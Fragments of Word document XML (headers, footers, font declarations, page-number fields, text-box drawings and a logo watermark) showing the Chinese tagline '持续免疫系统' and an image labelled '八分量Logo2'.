      <w:headerReference w:type="default" r:id="rId126"/>
      <w:footerReference w:type="default" r:id="rId127"/>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19E26" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751612">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AB63CF0" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751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ource Han Sans CN Medium">
    <w:altName w:val="Arial Unicode MS"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>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文鼎PL细上海宋Uni">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>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venir Black">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009B" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Avenir Heavy Oblique">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000"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810083"/>
      <w:docPartObj>
        <w:docPartGallery w:val="AutoText"/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="4A486C7D" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
        <w:pPr>
          <w:pStyle w:val="a9"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A25348" w:rsidRPr="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="5776CAA8" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661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D4AF3" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="a9"/>
      <w:framePr w:w="347" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="10192" w:y="725"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A25348">
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>19</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="1A61218C" w14:textId="6483773A" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="ae"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2243F183" wp14:editId="2EEA5698">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>4393013</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>434975</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1185545" cy="333955"/>
              <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
              <wp:wrapNone/>
              <wp:docPr id="119" name="Text Box 1"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr txBox="1"/>
                    <wps:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1185545" cy="333955"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="581755E9" w14:textId="42ABADA1" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                          <w:pPr>
                            <w:rPr>
                              <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="22"/>
                              <w:szCs w:val="26"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique" w:hint="eastAsia"/>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="22"/>
                              <w:szCs w:val="26"/>
                            </w:rPr>
                            <w:t>持续免疫</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="22"/>
                              <w:szCs w:val="26"/>
                            </w:rPr>
                            <w:t>系统</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2243F183" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:345.9pt;margin-top:34.25pt;width:93.35pt;height:2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bW0AEAAI8DAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uO2yAQfa/Uf0C8N443dZW14qzarraq&#10;1Ju02w/AGGIkw9CBxE6/vgOO09tb1Rc0DIfDnDPD7m6yAzspDAZcw8vVmjPlJHTGHRr+9enhxZaz&#10;EIXrxABONfysAr/bP3+2G32tbqCHoVPIiMSFevQN72P0dVEE2Ssrwgq8cnSoAa2ItMVD0aEYid0O&#10;xc16/aoYATuPIFUIlL2fD/k+82utZPysdVCRDQ2n2mJeMa9tWov9TtQHFL438lKG+IcqrDCOHr1S&#10;3Yso2BHNX1TWSIQAOq4k2AK0NlJlDaSmXP+h5rEXXmUtZE7wV5vC/6OVn05fkJmOelfecuaEpSY9&#10;qSmyNzCxMvkz+lAT7NETME6UJuySDynZjh+ho2viGCGbMGm0yQySxwhNvp+vXidqmSjKbVW9rDiT&#10;dLbZbG6rKpEWol5uewzxnQLLUtBwpF5mdnH6EOIMXSDpMQcPZhhyPwf3W4I4U6ZIQlLBs6Q4tVMW&#10;vl3EtNCdSQ7CPCU01RT0gN85G2lCGh6+HQUqzob3jlqQxmkJcAnaJRBO0tWGR87m8G2cx+7o0Rx6&#10;Yi6zGgevyTZtsqJU4VzFpVzqevbkMqFprH7dZ9TPf7T/AQAA//8DAFBLAwQUAAYACAAAACEAPLhO&#10;7N4AAAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU6DQBCG7ya+w2ZMvNmFJiJFlqYxejIxpXjw&#10;uMAUNmVnkd22+Padnuztn8yXf77J17MdxAknbxwpiBcRCKTGtYY6Bd/Vx1MKwgdNrR4coYI/9LAu&#10;7u9ynbXuTCWedqETXEI+0wr6EMZMSt/0aLVfuBGJd3s3WR14nDrZTvrM5XaQyyhKpNWG+EKvR3zr&#10;sTnsjlbB5ofKd/P7VW/LfWmqahXRZ3JQ6vFh3ryCCDiHfxiu+qwOBTvV7kitF4OCZBWzeuCQPoNg&#10;IH25hprJZRyDLHJ5+0JxAQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO1lltbQAQAAjwMA&#10;AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhADy4TuzeAAAA&#10;CgEAAA8AAAAAAAAAAAAAAAAAKgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAA1BQAA&#10;AAA=&#10;" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="581755E9" w14:textId="42ABADA1" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="26"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique" w:hint="eastAsia"/>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="26"/>
                      </w:rPr>
                      <w:t>持续免疫</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="26"/>
                      </w:rPr>
                      <w:t>系统</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1984BA1" wp14:editId="0B2E7C9E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1254760</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>950595</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7994015" cy="134620"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="120" name="矩形 12"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="7994015" cy="134620"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:gradFill flip="none" rotWithShape="1">
                        <a:gsLst>
                          <a:gs pos="0">
                            <a:srgbClr val="5ABACF"/>
                          </a:gs>
                          <a:gs pos="99000">
                            <a:srgbClr val="479BAD"/>
                          </a:gs>
                        </a:gsLst>
                        <a:lin ang="0" scaled="1"/>
                        <a:tileRect/>
                      </a:gra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F2A54B" id="矩形 12" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-98.8pt;margin-top:74.85pt;width:629.45pt;height:10.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JulQIAAAYFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN1u0zAUvkfiHSzfs6Sl3Wi1dupaFSFN&#10;rGKgXbuOk1hybGO7TcfLIHHHQ/A4iNfgs5NuFewKceMc+/x+3zknl1eHRpG9cF4aPaODs5wSobkp&#10;pK5m9NPH9as3lPjAdMGU0WJGH4SnV/OXLy5bOxVDUxtVCEcQRPtpa2e0DsFOs8zzWjTMnxkrNJSl&#10;cQ0LuLoqKxxrEb1R2TDPz7PWuMI6w4X3eF11SjpP8ctS8HBbll4EomYUtYV0unRu45nNL9m0cszW&#10;kvdlsH+oomFSI+ljqBULjOyc/CtUI7kz3pThjJsmM2UpuUgYgGaQ/4HmrmZWJCwgx9tHmvz/C8vf&#10;7zeOyAK9G4IfzRo06dfX7z9/fCODYaSntX4Kqzu7cf3NQ4xYD6Vr4hcoyCFR+vBIqTgEwvF4MZmM&#10;8sGYEg7d4PXoHFkQJnvyts6Ht8I0JAoz6tCyxCTb3/jQmR5NeoKLtVSKlEpiXjSmihJnwr0MdeIL&#10;abpOePgnD0+sAWV5evau2i6VI3uGiRgvrhfLdV9Q5U+tJ5M8f8ZjdDG5XqxOPICkOmZSUhMWBx9M&#10;es6UiLRGWzYNUokPgNYBwsAlEFGjNGlndDgeIR3hDJhKxQLExsLd64oSpiosFw8uIdAm4k9RIzEr&#10;5usOjTdKFn1pSoPk2LquWVHamuIBvQZXXYGWryX8b5gPG+Yw9ciPTQ63OEplUJTpJUpq47489x7t&#10;MYzQUtJii1Dw5x1zaIl6p8H5ZDAaIWxIl9H4At0n7lSzPdXoXbM0aMsA9FmexGgf1FEsnWnusfCL&#10;mBUqpjlyd9T0l2Xothu/DC4Wi2SGVbMs3Og7y4/Toc1iF0wpU0Oe2OlJw7KlGe1/DHGbT+/J6un3&#10;Nf8NAAD//wMAUEsDBBQABgAIAAAAIQBrJNwh5QAAAA0BAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/B&#10;TsMwDIbvSLxDZCQuaEsKtKWl6TRNgCYQBzYQ17Tx2orGqZpsKzw92Qlutv5Pvz8Xi8n07ICj6yxJ&#10;iOYCGFJtdUeNhPft4+wOmPOKtOotoYRvdLAoz88KlWt7pDc8bHzDQgm5XElovR9yzl3dolFubgek&#10;kO3saJQP69hwPapjKDc9vxYi4UZ1FC60asBVi/XXZm8kxMP6effzOn1+xP7pahUvX/zDtpLy8mJa&#10;3gPzOPk/GE76QR3K4FTZPWnHegmzKEuTwIbkNkuBnRCRRDfAqjClIgNeFvz/F+UvAAAA//8DAFBL&#10;AQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBl&#10;c10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxz&#10;Ly5yZWxzUEsBAi0AFAAGAAgAAAAhAO7akm6VAgAABgUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9l&#10;Mm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAGsk3CHlAAAADQEAAA8AAAAAAAAAAAAAAAAA7wQAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAABBgAAAAA=&#10;" fillcolor="#5abacf" stroked="f" strokeweight="2pt">
              <v:fill color2="#479bad" rotate="t" angle="90" colors="0 #5abacf;64881f #479bad" focus="100%" type="gradien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22C1F" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751612">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61510C0C" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751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278BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00751612">
    <w:pPr>
      <w:pStyle w:val="aa"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="62CEE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1029" o:spid="_x0000_s2050" type="#_x0000_t75" alt="八分量Logo2" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:585.85pt;height:440.65pt;z-index:-251654144;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="八分量Logo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CC4F4" w14:textId="3E70F42B" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="aa"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E53E9FE" wp14:editId="44447CFB">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>4372610</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-63500</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="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318C7AE5" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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75536473" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="0E53E9FE" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="文本框 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.3pt;margin-top:-5pt;width:132.1pt;height:31.95pt;z-index:-2516449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RUDQIAANsDAAAOAAAAZHJzL2Uyb0RvYy54bWysU82O0zAQviPxDpbvNGnVn92o6WrZ1SKk&#10;5UdaeADXcRoL22Nst0l5AHiDPXHhznP1ORg72RLBDZGD5cnMfDPfN+P1VacVOQjnJZiSTic5JcJw&#10;qKTZlfTjh7sXF5T4wEzFFBhR0qPw9Grz/Nm6tYWYQQOqEo4giPFFa0vahGCLLPO8EZr5CVhh0FmD&#10;0yyg6XZZ5ViL6FplszxfZi24yjrgwnv8e9s76Sbh17Xg4V1dexGIKin2FtLp0rmNZ7ZZs2LnmG0k&#10;H9pg/9CFZtJg0TPULQuM7J38C0pL7sBDHSYcdAZ1LblIHJDNNP+DzUPDrEhcUBxvzzL5/wfL3x7e&#10;OyKrkl5SYpjGEZ0ev52+/zz9+EpmUZ7W+gKjHizGhe4ldDjmRNXbe+CfPDFw0zCzE9fOQdsIVmF7&#10;05iZjVJ7HB9Btu0bqLAO2wdIQF3tdNQO1SCIjmM6nkcjukB4LLlcrZYrdHH0zfPFarlIJVjxlG2d&#10;D68EaBIvJXU4+oTODvc+xG5Y8RQSixm4k0ql8StDWuS/mC1SwsijZcDtVFKX9CKP31BTmYFdJNRT&#10;C922G9TaQnVEng76bcPXgZcG3BdKWty0kvrPe+YEJeq1Qa0up/N5XM1kzBerGRpu7NmOPcxwhCpp&#10;oKS/3oS0zj2na9S0loluFL/vZOgVNyipMGx7XNGxnaJ+v8nNLwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;ANLGg5nfAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOxau4VESZpJhUBs&#10;QZSH1J0bu0lEPI5itwl/z7Ciy9Fc3XtOuZ1dL852DJ0nhNVSgbBUe9NRg/Dx/rzIQISoyejek0X4&#10;sQG21fVVqQvjJ3qz511sBJdQKDRCG+NQSBnq1jodln6wxL+jH52OfI6NNKOeuNz1cq1UKp3uiBda&#10;PdjH1tbfu5ND+Hw57r/u1Wvz5JJh8rOS5HKJeHszP2xARDvH/zD84TM6VMx08CcyQfQIaZalHEVY&#10;rBRLcSJP1ixzQEjucpBVKS8Vql8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAHMEkVA0C&#10;AADbAwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA0saD&#10;md8AAAAKAQAADwAAAAAAAAAAAAAAAABnBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AHMFAAAAAA==&#10;" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="318C7AE5" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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75536473" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="749D30CA" wp14:editId="4D659BCF">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-91440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-94615</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="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39C7B164" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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3CED2052" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="749D30CA" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.2pt;margin-top:-7.45pt;width:132.1pt;height:31.95pt;z-index:-251646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7VDgIAAOIDAAAOAAAAZHJzL2Uyb0RvYy54bWysU82O0zAQviPxDpbvNGnVtGzUdLXsahHS&#10;8iMtPIDjOI2F7TG226Q8ALzBnrhw57n6HIydbreCGyIHy5OZ+Wa+b8ary0ErshPOSzAVnU5ySoTh&#10;0Eizqeinj7cvXlLiAzMNU2BERffC08v182er3pZiBh2oRjiCIMaXva1oF4Its8zzTmjmJ2CFQWcL&#10;TrOApttkjWM9omuVzfJ8kfXgGuuAC+/x783opOuE37aCh/dt60UgqqLYW0inS2cdz2y9YuXGMdtJ&#10;fmyD/UMXmkmDRU9QNywwsnXyLygtuQMPbZhw0Bm0reQicUA20/wPNvcdsyJxQXG8Pcnk/x8sf7f7&#10;4IhsKoqDMkzjiA4P3w8/fh1+fiOzKE9vfYlR9xbjwvAKBhxzourtHfDPnhi47pjZiCvnoO8Ea7C9&#10;aczMzlJHHB9B6v4tNFiHbQMkoKF1OmqHahBExzHtT6MRQyA8llwsl4slujj65nmxXBSpBCsfs63z&#10;4bUATeKlog5Hn9DZ7s6H2A0rH0NiMQO3Uqk0fmVIX9GLYlakhDOPlgG3U0mN8uTxO9ZU5sguEhqp&#10;haEeko6JemReQ7NHug7GpcNHgpcO3FdKely4ivovW+YEJeqNQckupvN53NBkzIvlDA137qnPPcxw&#10;hKpooGS8Xoe01SO1K5S2lYn1UyfHlnGRkhjHpY+bem6nqKenuf4NAAD//wMAUEsDBBQABgAIAAAA&#10;IQDfYApt3QAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZKTdtmRTQGtpOiHQ&#10;riC2gcQta7y2onGqJlvL22O4wM2WP/3+/mIz+U5ccIhtIAPLhQKBVAXXUm3gsN/O1yBisuRsFwgN&#10;fGGETXl9VdjchZFe8bJLteAQirk10KTU51LGqkFv4yL0SHw7hcHbxOtQSzfYkcN9J1dK3UlvW+IP&#10;je3xscHqc3f2Bt6eTx/vWr3UT/62H8OkJPlMGjO7mR7uQSSc0h8MP/qsDiU7HcOZXBSdgflSa0Z/&#10;hwwEEyudcZmjAZ0pkGUh/1covwEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCchA7VDgIA&#10;AOIDAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDfYApt&#10;3QAAAAoBAAAPAAAAAAAAAAAAAAAAAGgEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;cgUAAAAA&#10;" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="39C7B164" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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3CED2052" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002271CE">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6B1BF" w14:textId="17DEF705" w:rsidR="00A5661A" w:rsidRDefault="00751612" w:rsidP="00051846">
    <w:pPr>
      <w:pStyle w:val="aa"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="347D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1028" o:spid="_x0000_s2049" type="#_x0000_t75" alt="八分量Logo2" style="position:absolute;left:0;text-align:left;margin-left:-19.9pt;margin-top:82.8pt;width:510pt;height:383.6pt;z-index:-251653120;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="八分量Logo2" gain="13107f" blacklevel="26214f"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00A5661A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251650048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5023ED02" wp14:editId="60167895">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-91440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-94787</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="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1E3D3D14" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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2E5CD779" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="5023ED02" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
